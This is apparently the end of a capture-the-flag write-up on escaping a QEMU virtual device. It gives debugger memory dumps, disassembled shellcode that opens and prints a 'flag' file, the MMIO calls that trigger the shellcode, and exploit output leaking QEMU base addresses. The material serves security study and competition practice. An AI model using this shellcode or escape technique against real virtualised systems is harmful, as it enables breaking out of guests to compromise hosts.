0x56119210c4f0: 0x000056119210c5e0      0x000056119210c000
0x56119210c500: 0x00005611911b1ae0      0x0000000000000000
0x56119210c510: 0x0000000000010000      0x0000000000000000
0x56119210c520: 0x00000000febb0000      0x000056118eb94320
0x56119210c530: 0x0000000000000000      0x0000000000010001
0x56119210c540: 0x0000000000000000      0x0000000000000000
0x56119210c550: 0x0000000000000001      0x0000000000000000
0x56119210c560: 0x000056119210c558      0x00005611920db5e0
0x56119210c570: 0x00005611911b1b98      0x0000000000000000
0x56119210c580: 0x000056119210c578      0x00005611920d06a0
0x56119210c590: 0x0000000000000000      0x0000000000000000
0x56119210c5a0: 0x0000000000000000      0x0000000000000000
0x56119210c5b0: 0x0000000000000000      0x0000000000000000
0x56119210c5c0: 0x0000000000000000      0x0000000000000000
0x56119210c5d0: 0x0000000000000000      0x0000000000000000
0x56119210c5e0: 0x000056119210c7b0      0x000056118e7b6ff0
0x56119210c5f0: 0x0000000000000000      0x0000000000000000
0x56119210c600: 0x0000000000000000      0x0000000000000000
0x56119210c610: 0x0000000000000000      0x0000000000000000
0x56119210c620: 0x0000000000000000      0x0000000000000000
gef> x/2gx 0x000056119210c5e0
0x56119210c5e0: 0x000056119210c7b0      0x000056118e7b6ff0
gef> x/8gx 0x000056119210c7b0
0x56119210c7b0: 0x56c03148f631485b      0x67616c66c7c74856
0x56119210c7c0: 0x050f02b0e7894857      0x4800000064c2c748
0x56119210c7d0: 0x050fc030c789e689      0x58050fc7894801b0
0x56119210c7e0: 0x00000000c3535858      0x0000000000000000
gef> x/23i 0x000056119210c7b0
   0x56119210c7b0:      pop    rbx
   0x56119210c7b1:      xor    rsi,rsi
   0x56119210c7b4:      xor    rax,rax
   0x56119210c7b7:      push   rsi
   0x56119210c7b8:      push   rsi
   0x56119210c7b9:      mov    rdi,0x67616c66
   0x56119210c7c0:      push   rdi
   0x56119210c7c1:      mov    rdi,rsp
   0x56119210c7c4:      mov    al,0x2
   0x56119210c7c6:      syscall
   0x56119210c7c8:      mov    rdx,0x64
   0x56119210c7cf:      mov    rsi,rsp
   0x56119210c7d2:      mov    edi,eax
   0x56119210c7d4:      xor    al,al
   0x56119210c7d6:      syscall
   0x56119210c7d8:      mov    al,0x1
   0x56119210c7da:      mov    rdi,rax
   0x56119210c7dd:      syscall
   0x56119210c7df:      pop    rax
   0x56119210c7e0:      pop    rax
   0x56119210c7e1:      pop    rax
   0x56119210c7e2:      push   rbx
   0x56119210c7e3:      ret

And we have everything ready, just call mprotect with mmio_write and then execute the shellcode with mmio_read:

  mmio_write(0x2000, 07);
  mmio_read(0);

Flag

And so, we achieved an exploit that prints out the flag and returns correctly from the program:

   ___             __  __
  / _ \ _   _  ___|  \/  | ___ _ __ ___  _   _
 | | | | | | |/ _ \ |\/| |/ _ \ '_ ` _ \| | | |
 | |_| | |_| |  __/ |  | |  __/ | | | | | |_| |
  \__\_\\__,_|\___|_|  |_|\___|_| |_| |_|\__,_|

-------------------------------------------------
[+]          By DiegoAltF4 and Dbd4           [+]
-------------------------------------------------

/root # /exploit
vm.nr_hugepages = 32
[*] buff virtual address  = 0x7fdbbf2eb000
[*] buff physical address = 0xafe4000

[*] base ==> 20
[*] off  ==> 0x7fff

[+] base ==> 21

[*] off  ==> 0x6f6b

[+] base ==> 16
[+] off  ==> 0xfe00

[+] qemu base address: 0x55f4968ce000
[+] mmio base address: 0x55f49a0e74a0

flag{fake_flag_4_testing}

The full exploit can be found in here: exploit.c.